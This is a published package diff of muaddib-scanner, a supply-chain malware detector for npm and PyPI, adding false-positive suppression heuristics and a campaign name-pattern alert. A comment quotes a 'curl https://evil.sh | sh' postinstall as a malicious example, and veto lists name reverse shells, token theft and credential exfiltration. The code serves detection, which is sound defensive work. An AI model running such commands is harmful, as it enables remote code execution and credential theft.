muaddib-scanner 2.11.23 → 2.11.28

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/README.md CHANGED
@@ -275,7 +275,7 @@ With pre-commit framework:
275
275
  ```yaml
276
276
  repos:
277
277
  - repo: https://github.com/DNSZLSK/muad-dib
278
- rev: v2.11.23
278
+ rev: v2.11.24
279
279
  hooks:
280
280
  - id: muaddib-scan
281
281
  ```
@@ -296,7 +296,7 @@ repos:
296
296
  | **FPR** (Benign random, v2.10.95 measure) | **7.0%** (14/200) | 200 random npm packages, stratified sampling |
297
297
  | **ADR** (Adversarial + Holdout) | **96.3%** (103/107) | 67 adversarial + 40 holdout (107 available on disk), global threshold=20 |
298
298
 
299
- **3594 tests** across 93 files. **234 rules** (229 RULES + 5 PARANOID).
299
+ **3602 tests** across 93 files. **234 rules** (229 RULES + 5 PARANOID).
300
300
 
301
301
  > **ML retrain methodology (v2.10.51):**
302
302
  > - Ground truth: 377 confirmed_malicious via auto-labeler (OSSF malicious-packages, GitHub Advisory Database, npm registry takedown correlation)
@@ -344,7 +344,7 @@ npm test
344
344
 
345
345
  ### Testing
346
346
 
347
- - **3594 tests** across 93 modular test files
347
+ - **3602 tests** across 93 modular test files
348
348
  - **56 fuzz tests** - Malformed inputs, ReDoS, unicode, binary
349
349
  - **Datadog 17K benchmark** - 14,587 confirmed malware samples (in-scope)
350
350
  - **Ground truth validation** - 67 real-world attacks (93.85% TPR@3, 86.2% TPR@20 — v2.10.95 measure)
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "muaddib-scanner",
3
- "version": "2.11.23",
3
+ "version": "2.11.28",
4
4
  "description": "Supply-chain threat detection & response for npm & PyPI/Python",
5
5
  "main": "src/index.js",
6
6
  "bin": {
@@ -141,6 +141,15 @@ const GITHUB_RELEASE_HOSTS = ['github.com', 'objects.githubusercontent.com', 'ra
141
141
  const BUNDLE_PATH_RE = /(?:^|[\\/])(?:dist|build|lib|out|umd|esm|cjs|bundle|_next[\\/]static|\.next[\\/]static|public[\\/]static|webpack|rollup)[\\/]/i;
142
142
  const BUNDLE_FILE_RE = /\.(?:min|bundle|prod|umd|iife|esm|cjs)\.(?:m?js|cjs)$|\.min\.js$|chunk-[0-9a-f]+\.js$|vendors?~?.*\.js$/i;
143
143
 
144
+ // v2.11.27 F12: reuse the exhaustive shared regex + veto helper from the
145
+ // scanner side (covers @kitware/vtk.js, playwright/lib/utilsBundleImpl,
146
+ // .yarn/releases, hash-suffixed chunks, Stencil sys/* dirs — patterns the
147
+ // narrower local BUNDLE_PATH_RE misses).
148
+ const {
149
+ BUNDLE_PATH_RE: SHARED_BUNDLE_PATH_RE,
150
+ hasBundleVetoSignal
151
+ } = require('../shared/bundle-detect.js');
152
+
144
153
  // Threat types that indicate remote content fetch in a file (for
145
154
  // `git_hook_source_local` heuristic: absence => local source).
146
155
  const REMOTE_FETCH_TYPES = new Set([
@@ -792,6 +801,344 @@ function vendorCliSdk(result, meta) {
792
801
  return true;
793
802
  }
794
803
 
804
+ // ============================================================================
805
+ // Feature 11 — ai_agent_bot (v2.11.24, audit week3 cluster, 54 FP)
806
+ // ============================================================================
807
+ //
808
+ // Targets the third cluster from the audit 2026-05-week3 (54 entries,
809
+ // 18.9% of FP): packages that ARE themselves multi-provider AI agents,
810
+ // orchestrators, chatbots, or IM⇄AI bridges. Examples: gm-skill (AI coding
811
+ // harness), codexmate (multi-provider orchestrator), lazyclaw (terminal
812
+ // multi-LLM CLI), linco-connect (WeChat→Claude bridge), natureco-cli
813
+ // (WhatsApp+Telegram bot), multis (Telegram chatbot), @aitne-sh/aitne
814
+ // (personal AI daemon), @jhizzard/termdeck (browser term mux with AI),
815
+ // triflux (Claude Code router), opuscode (Claude config wizard).
816
+ //
817
+ // These packages legitimately fire `dangerous_call_eval` (LLM tool-use
818
+ // execute_code feature), `remote_code_load` (bun x pkg@latest fetching),
819
+ // `detached_credential_exfil` (local session token storage), and lots
820
+ // of `env_access` + `suspicious_dataflow`. F11 cannot blacklist these —
821
+ // they ARE the core capabilities. Instead the conjunction requires:
822
+ //
823
+ // - Positive AI agent identity (name/desc/keywords/deps signal)
824
+ // - Evidence the package operates on agent runtime data (touches paths
825
+ // like ~/.claude/, ~/.codex/, ~/.cursor/, etc.)
826
+ // - Absence of SANDWORM_MODE signatures: no preinstall, no
827
+ // mcp_config_injection (F9 priority), no third-party suspicious_domain,
828
+ // no credential file harvest, no binary dropper (F2 priority).
829
+ //
830
+ // Cap 35 (aligned with F10 — broader conjunction than F9).
831
+
832
+ // Agent runtime directory regex — matches references in threat messages to
833
+ // AI tool runtime paths. Both '~/.X/' and 'os.homedir() + "/.X"' patterns
834
+ // surface as substrings here.
835
+ const AGENT_RUNTIME_PATHS_RE = /[~/\\\\]\.(?:claude|codex|cursor|windsurf|continue|openclaude|openclaudia|hermes|aiflow|tdpilot|aitne|kimi|opuscode|freddie|gm-?log|gm-?skill|termdeck|relaydesk|natureco|grok|gemini|copilot|cline|aider|cody|tabnine|cursor-ai|cursorrules|claude-?desktop|claude-?code|llm[- ]?cache)\b/i;
836
+
837
+ // AI agent name regex — package name signals identity.
838
+ const AGENT_NAME_RE = /(?:^|[/_-])(?:agent|bot|chat|chatbot|claw|codex|coder|swarm|harness|brain|orchestr|orchestrator|claude|llm|hermes|aider|kimi|cline|cody|aitne|opuscode|relaydesk|termdeck|gm-skill|gm-hermes|gm-qwen|gm-thebird|gm-plugkit|relipa|triflux|protocol-proxy|codexmate|lazy?claw|natureco)(?:[_-]|$)/i;
839
+
840
+ // Keywords that signal AI agent purpose (case-insensitive).
841
+ const AGENT_KEYWORDS_SET = new Set([
842
+ 'agent', 'ai', 'llm', 'chatbot', 'bot', 'claude', 'codex',
843
+ 'cursor', 'copilot', 'ollama', 'openai', 'anthropic', 'gemini',
844
+ 'multi-llm', 'multi-provider', 'orchestrator', 'coding-agent',
845
+ 'ai-agent', 'llm-agent', 'mcp-agent'
846
+ ]);
847
+
848
+ // Description regex — matches agent purpose phrases.
849
+ const AGENT_DESC_RE = /\b(?:ai|llm|claude|codex|gemini|openai|anthropic|ollama)[ -]?(?:agent|bot|chatbot|orchestrator|harness|cli|assistant|coding[ -]?agent|gateway|relay|router|harness|workspace)\b|\bmulti[ -]?provider\b|\bcoding[ -]?agent\b|\bagent[ -]?(?:bridge|router|orchestrator)\b|telegram[ -]?(?:bot|bridge)|whatsapp[ -]?(?:bot|bridge)|wechat[ -]?(?:bot|bridge)/i;
850
+
851
+ // Dependency names that signal AI agent / bot framework usage.
852
+ const AGENT_DEPS = new Set([
853
+ '@anthropic-ai/sdk', '@anthropic-ai/claude-code', '@openai/agents', 'openai',
854
+ '@google/genai', '@google/generative-ai', 'ai', 'ollama', 'groq-sdk',
855
+ 'telegraf', 'node-telegram-bot-api', '@whiskeysockets/baileys',
856
+ 'whatsapp-web.js', 'discord.js', 'eventsource', 'node-pty',
857
+ '@anthropic-ai/bedrock-sdk', '@openai/realtime-api-beta'
858
+ ]);
859
+
860
+ function _f11HasAgentIdentity(meta) {
861
+ if (!meta) return false;
862
+ const name = String(meta.name || '');
863
+ if (AGENT_NAME_RE.test(name)) return true;
864
+ const r = (meta.registryMeta || {});
865
+ const desc = r.description || meta.description || '';
866
+ if (AGENT_DESC_RE.test(desc)) return true;
867
+ if (Array.isArray(r.keywords)) {
868
+ for (const k of r.keywords) {
869
+ if (AGENT_KEYWORDS_SET.has(String(k).toLowerCase())) return true;
870
+ }
871
+ }
872
+ const deps = r.dependencies || meta.dependencies;
873
+ if (deps && typeof deps === 'object') {
874
+ for (const d of Object.keys(deps)) {
875
+ if (AGENT_DEPS.has(d)) return true;
876
+ }
877
+ }
878
+ return false;
879
+ }
880
+
881
+ function _f11HasAgentPathReference(threats) {
882
+ for (const t of threats) {
883
+ const msg = String(t.message || '');
884
+ if (AGENT_RUNTIME_PATHS_RE.test(msg)) return true;
885
+ // Also accept the threat's file field — sometimes the path leaks via the
886
+ // file location rather than the message body.
887
+ const file = String(t.file || '');
888
+ if (AGENT_RUNTIME_PATHS_RE.test(file)) return true;
889
+ }
890
+ return false;
891
+ }
892
+
893
+ /**
894
+ * Feature 11 — TRUE iff the package self-identifies as an AI agent / bot /
895
+ * multi-LLM orchestrator AND demonstrably operates on AI tool runtime
896
+ * data (~/.claude/, ~/.codex/, ~/.cursor/, etc.) AND lacks the
897
+ * SANDWORM_MODE / vendor-impersonation signatures.
898
+ *
899
+ * Conjunction of 7 conditions:
900
+ *
901
+ * C1 AI agent identity (name|desc|keywords|deps signal)
902
+ * C2 no install lifecycle hook
903
+ * C3 no `mcp_config_injection` (F9 priority)
904
+ * C4 no `suspicious_domain` threat (third-party exfil discriminator)
905
+ * C5 no credential file path in any threat message (reuse F9 regex)
906
+ * C6 >=1 threat references an agent runtime path (positive operating signal)
907
+ * C7 no `binary_dropper` / `download_exec_binary` (F2 priority)
908
+ *
909
+ * Cap 35. Same cap as F10 (broader conjunction than F9). Reuses
910
+ * `F9_CREDENTIAL_FILE_RE` from v2.11.22.
911
+ *
912
+ * Discriminator vs malware:
913
+ * - SANDWORM droppers use preinstall/postinstall (C2 blocks).
914
+ * - MCP-impersonating malware emits mcp_config_injection (C3 → F9).
915
+ * - Exfilers have suspicious_domain (C4 blocks).
916
+ * - Binary droppers (C7 → F2 territory).
917
+ * - Credential file harvesters (C5 blocks).
918
+ *
919
+ * Covers up to 54 FP (18.9% of audit week3). Effective estimated coverage
920
+ * 30-40 (55-75%): the rest lack agent runtime path references or fire on
921
+ * suspicious_domain due to Chinese model rerouting (yingclaw pattern).
922
+ */
923
+ function aiAgentBot(result, meta) {
924
+ // C1 — identity
925
+ if (!_f11HasAgentIdentity(meta)) return false;
926
+ const threats = (result && result.threats) || [];
927
+ if (threats.length === 0) return false;
928
+ // C2 — no install lifecycle hook
929
+ if (hasLifecycleScripts(meta)) return false;
930
+ // C3, C4, C7 — fast threat-type checks
931
+ for (const t of threats) {
932
+ if (t.type === 'mcp_config_injection') return false; // C3
933
+ if (t.type === 'suspicious_domain') return false; // C4
934
+ if (t.type === 'binary_dropper') return false; // C7
935
+ if (t.type === 'download_exec_binary') return false; // C7
936
+ }
937
+ // C5 — no credential file path in any message
938
+ for (const t of threats) {
939
+ if (F9_CREDENTIAL_FILE_RE.test(String(t.message || ''))) return false;
940
+ }
941
+ // C6 — at least one threat references an agent runtime path
942
+ if (!_f11HasAgentPathReference(threats)) return false;
943
+ return true;
944
+ }
945
+
946
+ // ============================================================================
947
+ // Feature 12 — vendor_minified_bundle (v2.11.27, weekly review 2026-05-22, 9 FP)
948
+ // ============================================================================
949
+ //
950
+ // Targets the @photoroom/ui (1.8MB UMD bundle, 6 cascade types) and
951
+ // @vkontakte/videoplayer-shared (32KB min, 4 cascade types) cluster: vendor
952
+ // React/JS bundles where webpack/rollup/esbuild output legitimately produces
953
+ // `eval`, `new Function`, prototype mutations for framework reactivity,
954
+ // `Proxy({set/get})` interceptors, credential-regex-looking strings, and
955
+ // minified blobs that trip the obfuscation heuristic. Per-file co-occurrence
956
+ // of >=3 of those patterns on a path matching the shared BUNDLE_PATH_RE (or a filename matching BUNDLE_FILE_RE) is the signal.
957
+ //
958
+ // Complements F1 (bundleWithoutInstallScripts, cap 30) which requires ALL
959
+ // threat files to exceed 100KB and ALL threats to carry t.file — both
960
+ // conditions are too strict for the v2.11.27 cluster (vkontakte is 32KB; the
961
+ // cluster co-occurs with package-level `intent_credential_exfil` for some
962
+ // packages). F12 uses a 20KB floor per cascade file and an explicit C3
963
+ // veto on package-level exfil intents instead of disqualifying outright.
964
+
965
+ const CASCADE_TYPES = new Set([
966
+ 'credential_regex_harvest', // MUADDIB-AST-041
967
+ 'dangerous_call_eval', // MUADDIB-AST-004
968
+ 'dangerous_call_function', // MUADDIB-AST-005
969
+ 'prototype_pollution', // MUADDIB-AST-065
970
+ 'proxy_data_intercept', // MUADDIB-AST-043
971
+ 'remote_code_load', // MUADDIB-AST-040
972
+ 'obfuscation_detected', // src/scanner/obfuscation.js
973
+ 'js_obfuscation_pattern'
974
+ ]);
975
+ const CASCADE_MIN_TYPES = 3;
976
+ const CASCADE_MIN_FILE_BYTES = 20 * 1024;
977
+
978
+ /**
979
+ * Feature 12 — TRUE iff the package ships at least one minified vendor
980
+ * bundle file with >=3 distinct CASCADE_TYPES firing on it AND has no
981
+ * install lifecycle script AND no veto signal AND no package-level exfil
982
+ * intent.
983
+ *
984
+ * Discriminator vs malware injected into a bundle:
985
+ * - hasBundleVetoSignal (src/shared/bundle-detect.js) catches reverse_shell,
986
+ * node_modules_write, npm_publish_worm, npm_token_steal, systemd_persistence,
987
+ * unicode_invisible_injection (GlassWorm), ioc_match,
988
+ * known_malicious_package, shai_hulud_marker, detached_credential_exfil,
989
+ * ai_config_injection, ide_task_persistence, plus env_access on
990
+ * SENSITIVE_ENV_RE (NPM_TOKEN, AWS_*, SSH_*, etc.).
991
+ * - C3 catches Axios UNC1069-style package-level intent_credential_exfil /
992
+ * intent_command_exfil (no `t.file` → not file-scoped → real campaign).
993
+ * - C2 (no lifecycle) catches postinstall droppers.
994
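+ * - The 20KB floor (CASCADE_MIN_FILE_BYTES) catches hand-written 4KB eval injections in dist/, but only when summary.fileSizes records a numeric size for the file; a file with no recorded size is not filtered by the floor.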
995
+ *
996
+ * Cap 25 (MEDIUM). Tighter than F1=30: the cascade of >=3 bundler-emitted
997
+ * heuristics on a single file is a stronger structural bundler signature
998
+ * than "any large file with no install hook".
999
+ */
1000
+ function vendorMinifiedBundle(result, meta) {
1001
+ if (!meta || !meta.registryMeta || meta.registryMeta.scripts === undefined) return false;
1002
+ if (hasLifecycleScripts(meta)) return false;
1003
+
1004
+ const threats = (result && result.threats) || [];
1005
+ if (threats.length === 0) return false;
1006
+
1007
+ // C3 — package-level exfil intent disqualifies (real campaign signal,
1008
+ // not bundler artifact: bundlers never produce intent threats without
1009
+ // a backing file).
1010
+ for (const t of threats) {
1011
+ if ((t.type === 'intent_credential_exfil' || t.type === 'intent_command_exfil') && !t.file) {
1012
+ return false;
1013
+ }
1014
+ }
1015
+
1016
+ const summary = (result && result.summary) || {};
1017
+ const fileSizes = summary.fileSizes || {};
1018
+ const typesByFile = new Map();
1019
+
1020
+ for (const t of threats) {
1021
+ if (!t.file || !CASCADE_TYPES.has(t.type)) continue;
1022
+ if (!SHARED_BUNDLE_PATH_RE.test(t.file) && !BUNDLE_FILE_RE.test(t.file)) continue;
1023
+ if (!typesByFile.has(t.file)) typesByFile.set(t.file, new Set());
1024
+ typesByFile.get(t.file).add(t.type);
1025
+ }
1026
+
1027
+ for (const [file, types] of typesByFile) {
1028
+ if (types.size < CASCADE_MIN_TYPES) continue;
1029
+ if (hasBundleVetoSignal(threats, file)) continue;
1030
+ const size = fileSizes[file];
1031
+ if (typeof size === 'number' && size < CASCADE_MIN_FILE_BYTES) continue;
1032
+ return true;
1033
+ }
1034
+ return false;
1035
+ }
1036
+
1037
+ // ============================================================================
1038
+ // Feature 13 — typosquat_benign_lifecycle (v2.11.28, weekly review 2026-05-22, 9 FP)
1039
+ // ============================================================================
1040
+ //
1041
+ // Targets the dependency_typosquat boundary-squat cluster (Axios UNC1069 rule
1042
+ // RT-C1 fired in March 2026 + RT-C1-FPR audit 2026-05). The boundary-squat
1043
+ // scanner emits `dependency_typosquat` MEDIUM on any sub-dep matching
1044
+ // `<prefix>-<popular>` or `<popular>-<suffix>` when the extra token is not in
1045
+ // LEGIT_BOUNDARY_TOKENS. The compound `typosquat_lifecycle` (CRITICAL,
1046
+ // src/scoring.js:517-523) escalates it to CRITICAL whenever a lifecycle hook
1047
+ // is present — including provably benign ones like `husky install`,
1048
+ // `npm run build`, or `node patches/apply-patches.js` (balena-cli pattern).
1049
+ //
1050
+ // F13 suppresses that compound's contribution when all lifecycle scripts are
1051
+ // provably benign AND no real exfil / IOC / `dependency_typosquat_used`
1052
+ // signal is present. The Axios UNC1069 discriminator (require()d sub-dep)
1053
+ // emits dependency_typosquat_used + the dependency_typosquat_require
1054
+ // compound — both vetoed in F13_VETO_TYPES.
1055
+ //
1056
+ // Reuses `isSafeLifecycleScript` from src/monitor/temporal.js:53 (covers
1057
+ // `npm run build`, `tsc`, `eslint`, etc.) and extends it with audit-observed
1058
+ // patterns: husky install, simple-git-hooks, patch-package,
1059
+ // `node patches/apply-patches.js`, is-ci || X guard.
1060
+
1061
+ const { isSafeLifecycleScript } = require('../monitor/temporal.js');
1062
+
1063
+ const F13_BENIGN_SCRIPT_RE = /^(?:is-ci\s*\|\|\s*)?(?:husky(?:\s+install)?|simple-git-hooks|patch-package|node\s+patches\/apply-patches\.js|npm\s+run\s+build(?::[a-z0-9_-]+)?)\s*$/i;
1064
+
1065
+ function isBenignLifecycleScript(value) {
1066
+ if (!value || typeof value !== 'string') return false;
1067
+ if (isSafeLifecycleScript(value)) return true;
1068
+ return value.trim().split(/\s*&&\s*/).every(cmd => F13_BENIGN_SCRIPT_RE.test(cmd.trim()));
1069
+ }
1070
+
1071
+ const F13_VETO_TYPES = new Set([
1072
+ // Egress / exfil — any real network capability is a campaign signal
1073
+ 'suspicious_dataflow', 'suspicious_domain', 'remote_code_load', 'curl_exec',
1074
+ 'intent_credential_exfil', 'intent_command_exfil', 'fetch_decrypt_exec',
1075
+ 'reverse_shell', 'binary_dropper', 'download_exec_binary',
1076
+ 'curl_env_exfil', 'external_tarball_dep', 'dependency_url_suspicious',
1077
+ 'blockchain_c2_resolution', 'dns_exfil',
1078
+ // Worm propagation (Shai-Hulud)
1079
+ 'npm_publish_worm', 'node_modules_write', 'npm_token_steal',
1080
+ // IOC hits
1081
+ 'ioc_match', 'known_malicious_package', 'shai_hulud_marker', 'ioc_string_match',
1082
+ // DPRK / mini Shai-Hulud 2026-05
1083
+ 'detached_credential_exfil', 'ai_config_injection', 'ide_task_persistence',
1084
+ // Axios UNC1069 discriminator: dep is require()d in code
1085
+ 'dependency_typosquat_used', 'dependency_typosquat_require'
1086
+ ]);
1087
+
1088
+ const F13_LIFECYCLE_KEYS = ['preinstall', 'install', 'postinstall', 'prepare'];
1089
+
1090
+ /**
1091
+ * Feature 13 — TRUE iff the package shows the compound `typosquat_lifecycle`
1092
+ * (boundary-squat dep + lifecycle hook) AND every declared lifecycle script
1093
+ * is provably benign AND no exfil / IOC / dep-usage signal is present.
1094
+ *
1095
+ * Discriminator vs malware:
1096
+ * - Axios UNC1069 wrappers emit `dependency_typosquat_used` (the dep is
1097
+ * require()d in source) + compound `dependency_typosquat_require` → veto.
1098
+ * - Shai-Hulud worm emits `npm_publish_worm`, `node_modules_write`,
1099
+ * `npm_token_steal` → veto.
1100
+ * - GlassWorm / DPRK emit `detached_credential_exfil` /
1101
+ * `ai_config_injection` / `ide_task_persistence` → veto. Their
1102
+ * `unicode_invisible_injection` is not in F13_VETO_TYPES (irrelevant downstream — caught at scanner severity).
1103
+ * - Real install-time droppers carry suspicious_dataflow / suspicious_domain
1104
+ * / remote_code_load / curl_exec / intent_*_exfil → veto.
1105
+ * - Hand-crafted `curl https://evil.sh | sh` postinstall fails
1106
+ * isBenignLifecycleScript → veto.
1107
+ *
1108
+ * Targets the v2.11.28 weekly review 2026-05-22 cluster:
1109
+ * - @doyourjob/gravity-ui-page-constructor (prepare: husky install)
1110
+ * - balena-cli (postinstall: node patches/apply-patches.js)
1111
+ * - magmastream (prepare: npm run build)
1112
+ * - @1d1s/design-system (prepare: npm run build:lib)
1113
+ * - @healthcare-interoperability/fhir-storage-core (prepare: npm run build)
1114
+ * - @quicore/problem-details-error (prepare: npm run build)
1115
+ *
1116
+ * Cap 30 (MEDIUM). Matches the F9 (mcp_server_env_access) cap because both
1117
+ * suppress a compound-driven CRITICAL into the residual MEDIUM signal.
1118
+ */
1119
+ function typosquatBenignLifecycle(result, meta) {
1120
+ const threats = (result && result.threats) || [];
1121
+ if (!threats.some(t => t.type === 'dependency_typosquat' || t.type === 'typosquat_detected')) return false;
1122
+ if (!threats.some(t => t.type === 'lifecycle_script')) return false;
1123
+ if (!threats.some(t => t.type === 'typosquat_lifecycle')) return false;
1124
+
1125
+ for (const t of threats) {
1126
+ if (F13_VETO_TYPES.has(t.type)) return false;
1127
+ }
1128
+
1129
+ const scripts = (meta && meta.registryMeta && meta.registryMeta.scripts) || null;
1130
+ if (!scripts || typeof scripts !== 'object') return false;
1131
+
1132
+ let sawScript = false;
1133
+ for (const key of F13_LIFECYCLE_KEYS) {
1134
+ const v = scripts[key];
1135
+ if (typeof v !== 'string' || v.trim().length === 0) continue;
1136
+ sawScript = true;
1137
+ if (!isBenignLifecycleScript(v)) return false;
1138
+ }
1139
+ return sawScript;
1140
+ }
1141
+
795
1142
  /**
796
1143
  * Feature 8 — TRUE iff the package declares at least one install
797
1144
  * lifecycle script AND the scan shows no network egress capability
@@ -946,6 +1293,8 @@ function extractFeatures(result, meta) {
946
1293
  features.mcp_server_env_access = mcpServerEnvAccess(result, meta) ? 1 : 0;
947
1294
  // --- v2.11.23 Feature 10 (audit week3 cluster — up to 96 FP) ---
948
1295
  features.vendor_cli_sdk = vendorCliSdk(result, meta) ? 1 : 0;
1296
+ // --- v2.11.24 Feature 11 (audit week3 cluster — up to 54 FP) ---
1297
+ features.ai_agent_bot = aiAgentBot(result, meta) ? 1 : 0;
949
1298
 
950
1299
  return features;
951
1300
  }
@@ -1026,5 +1375,9 @@ module.exports = {
1026
1375
  placeholderAntiDepConfusion,
1027
1376
  installScriptNoNetworkEgress,
1028
1377
  mcpServerEnvAccess,
1029
- vendorCliSdk
1378
+ vendorCliSdk,
1379
+ aiAgentBot,
1380
+ vendorMinifiedBundle,
1381
+ typosquatBenignLifecycle,
1382
+ isBenignLifecycleScript
1030
1383
  };
@@ -14,7 +14,23 @@ const {
14
14
  loadNpmSeq, saveNpmSeq, CHANGES_STREAM_URL, CHANGES_LIMIT, CHANGES_CATCHUP_MAX,
15
15
  savePypiSerial, PYPI_XMLRPC_URL, PYPI_CATCHUP_MAX
16
16
  } = require('./state.js');
17
- const { sendIOCPreAlert } = require('./webhook.js');
17
+ const { sendIOCPreAlert, sendCampaignPreAlert } = require('./webhook.js');
18
+
19
+ // Active-campaign name patterns. Pre-alert fires on match BEFORE tarball
20
+ // download so operators have visibility while IOC lists catch up (typical
21
+ // lag: hours to days).
22
+ // did-NNNN (May 2026): wave of did-0001..did-9999 publications observed in
23
+ // the changes stream — name shape alone is enough to flag for fast triage.
24
+ const CAMPAIGN_PATTERNS = [
25
+ { name: 'did-NNNN', re: /^did-\d{4}$/ }
26
+ ];
27
+
28
+ function matchCampaignPattern(name) {
29
+ for (const c of CAMPAIGN_PATTERNS) {
30
+ if (c.re.test(name)) return c.name;
31
+ }
32
+ return null;
33
+ }
18
34
  const { evaluateCacheTrigger, POPULAR_THRESHOLD, downloadsCache, DOWNLOADS_CACHE_TTL } = require('./classify.js');
19
35
 
20
36
  const SELF_PACKAGE_NAME = require('../../package.json').name;
@@ -133,105 +149,6 @@ async function getWeeklyDownloads(packageName) {
133
149
  }
134
150
  }
135
151
 
136
- // --- Trusted dependency diff check ---
137
-
138
- const TRUSTED_DEP_AGE_THRESHOLD_MS = 7 * 24 * 60 * 60 * 1000; // 7 days
139
-
140
- /**
141
- * Check for new dependencies added to a TRUSTED (popular) package.
142
- * Detects supply-chain attacks where a compromised maintainer account adds a
143
- * malicious dependency in a patch bump (e.g., axios 1.14.0 → 1.14.1 adding
144
- * plain-crypto-js, 2026-03-30).
145
- *
146
- * @param {string} name - Package name
147
- * @param {string} newVersion - Newly published version
148
- * @returns {Array} Array of findings (empty if no new deps or on error)
149
- */
150
- async function checkTrustedDepDiff(name, newVersion) {
151
- const findings = [];
152
- try {
153
- // Fetch packument to get version list and dependencies
154
- const body = await httpsGet(`https://registry.npmjs.org/${encodeURIComponent(name)}`, 10_000);
155
- const packument = JSON.parse(body);
156
-
157
- if (!packument.versions || !packument.time) return findings;
158
-
159
- // Sort versions by publish time (not semver — handles prereleases correctly)
160
- const timeMap = packument.time;
161
- const versionKeys = Object.keys(packument.versions)
162
- .filter(v => timeMap[v])
163
- .sort((a, b) => new Date(timeMap[a]) - new Date(timeMap[b]));
164
-
165
- const newIdx = versionKeys.indexOf(newVersion);
166
- if (newIdx <= 0) return findings; // First version or not found
167
-
168
- const prevVersion = versionKeys[newIdx - 1];
169
-
170
- const prevDeps = (packument.versions[prevVersion] && packument.versions[prevVersion].dependencies) || {};
171
- const newDeps = (packument.versions[newVersion] && packument.versions[newVersion].dependencies) || {};
172
-
173
- // Find newly added dependencies (name not present in previous version)
174
- const addedDeps = Object.keys(newDeps).filter(dep => !(dep in prevDeps));
175
- if (addedDeps.length === 0) return findings;
176
-
177
- console.log(`[MONITOR] TRUSTED dep diff: ${name} ${prevVersion} → ${newVersion}: +${addedDeps.length} new dep(s): ${addedDeps.join(', ')}`);
178
-
179
- for (const dep of addedDeps) {
180
- let ageMs = null;
181
- try {
182
- const depBody = await httpsGet(`https://registry.npmjs.org/${encodeURIComponent(dep)}`, 5_000);
183
- const depData = JSON.parse(depBody);
184
- const created = depData.time && depData.time.created;
185
- if (created) {
186
- ageMs = Date.now() - new Date(created).getTime();
187
- }
188
- } catch (err) {
189
- console.log(`[MONITOR] WARNING: could not check age of dependency ${dep}: ${err.message}`);
190
- }
191
-
192
- if (ageMs === null || ageMs < TRUSTED_DEP_AGE_THRESHOLD_MS) {
193
- // Unknown or < 7 days old — CRITICAL
194
- const ageDays = ageMs !== null ? Math.floor(ageMs / 86400000) : 'unknown';
195
- findings.push({
196
- type: 'trusted_new_unknown_dependency',
197
- severity: 'CRITICAL',
198
- confidence: ageMs === null ? 'medium' : 'high',
199
- file: 'package.json',
200
- message: `TRUSTED package ${name} added unknown dependency ${dep} (age: ${ageDays}d) in version ${prevVersion} → ${newVersion}`,
201
- rule_id: 'MUADDIB-TRUSTED-001',
202
- mitre: 'T1195.002',
203
- dep,
204
- depAgeDays: ageDays,
205
- prevVersion,
206
- newVersion
207
- });
208
- } else {
209
- // Known dependency (>= 7 days old) — HIGH
210
- const ageDays = Math.floor(ageMs / 86400000);
211
- findings.push({
212
- type: 'trusted_new_dependency',
213
- severity: 'HIGH',
214
- confidence: 'medium',
215
- file: 'package.json',
216
- message: `TRUSTED package ${name} added new dependency ${dep} (age: ${ageDays}d) in version ${prevVersion} → ${newVersion}`,
217
- rule_id: 'MUADDIB-TRUSTED-002',
218
- mitre: 'T1195.002',
219
- dep,
220
- depAgeDays: ageDays,
221
- prevVersion,
222
- newVersion
223
- });
224
- }
225
- }
226
-
227
- return findings;
228
- } catch (err) {
229
- // Graceful fallback — log warning, continue as TRUSTED
230
- console.log(`[MONITOR] WARNING: trusted dep diff check failed for ${name}@${newVersion}: ${err.message}`);
231
- return findings;
232
- }
233
- }
234
-
235
152
  // --- Tarball URL helpers ---
236
153
 
237
154
  function getNpmTarballUrl(pkgData) {
@@ -595,6 +512,20 @@ async function pollNpmChanges(state, scanQueue, stats) {
595
512
  console.warn(`[MONITOR] IOC pre-check failed: ${err.message}`);
596
513
  }
597
514
 
515
+ // Layer 1b: Campaign pre-alert — fire on name-pattern matches when the
516
+ // package isn't already a known IOC (avoid duplicate webhooks for the
517
+ // same publication). Lets us flag campaign waves while IOC lists lag.
518
+ if (!isKnownIOC) {
519
+ const campaign = matchCampaignPattern(name);
520
+ if (campaign) {
521
+ console.log(`[MONITOR] CAMPAIGN PRE-ALERT: ${name} — matches ${campaign}`);
522
+ stats.campaignPreAlerts = (stats.campaignPreAlerts || 0) + 1;
523
+ sendCampaignPreAlert(name, campaign).catch(err => {
524
+ console.error(`[MONITOR] campaign pre-alert webhook failed for ${name}: ${err.message}`);
525
+ });
526
+ }
527
+ }
528
+
598
529
  // Layer 2: Extract tarball URL from CouchDB doc (eliminates lazy resolution 404 race)
599
530
  const docMeta = change.doc ? extractTarballFromDoc(change.doc) : null;
600
531
 
@@ -690,9 +621,10 @@ async function pollNpmRss(state, scanQueue, stats) {
690
621
 
691
622
  // Layer 1: IOC pre-alert (RSS fallback path)
692
623
  // Only wildcard IOCs trigger here; versioned IOCs checked in resolveTarballAndScan().
624
+ let isKnownIOC = false;
693
625
  try {
694
626
  const iocs = loadCachedIOCs();
695
- const isKnownIOC = iocs.wildcardPackages && iocs.wildcardPackages.has(name);
627
+ isKnownIOC = iocs.wildcardPackages && iocs.wildcardPackages.has(name);
696
628
  if (isKnownIOC) {
697
629
  console.log(`[MONITOR] IOC PRE-ALERT: ${name} — known malicious package detected via RSS`);
698
630
  stats.iocPreAlerts = (stats.iocPreAlerts || 0) + 1;
@@ -702,6 +634,18 @@ async function pollNpmRss(state, scanQueue, stats) {
702
634
  }
703
635
  } catch { /* IOC load failure is non-fatal */ }
704
636
 
637
+ // Layer 1b: Campaign pre-alert (RSS fallback path) — mirrors pollNpmChanges.
638
+ if (!isKnownIOC) {
639
+ const campaign = matchCampaignPattern(name);
640
+ if (campaign) {
641
+ console.log(`[MONITOR] CAMPAIGN PRE-ALERT: ${name} — matches ${campaign} (RSS)`);
642
+ stats.campaignPreAlerts = (stats.campaignPreAlerts || 0) + 1;
643
+ sendCampaignPreAlert(name, campaign).catch(err => {
644
+ console.error(`[MONITOR] campaign pre-alert webhook failed for ${name}: ${err.message}`);
645
+ });
646
+ }
647
+ }
648
+
705
649
  // Queue npm packages — tarball URL resolved during scan
706
650
  scanQueue.push({
707
651
  name,
@@ -1150,8 +1094,6 @@ module.exports = {
1150
1094
  httpsGet,
1151
1095
  httpsPost,
1152
1096
  getWeeklyDownloads,
1153
- checkTrustedDepDiff,
1154
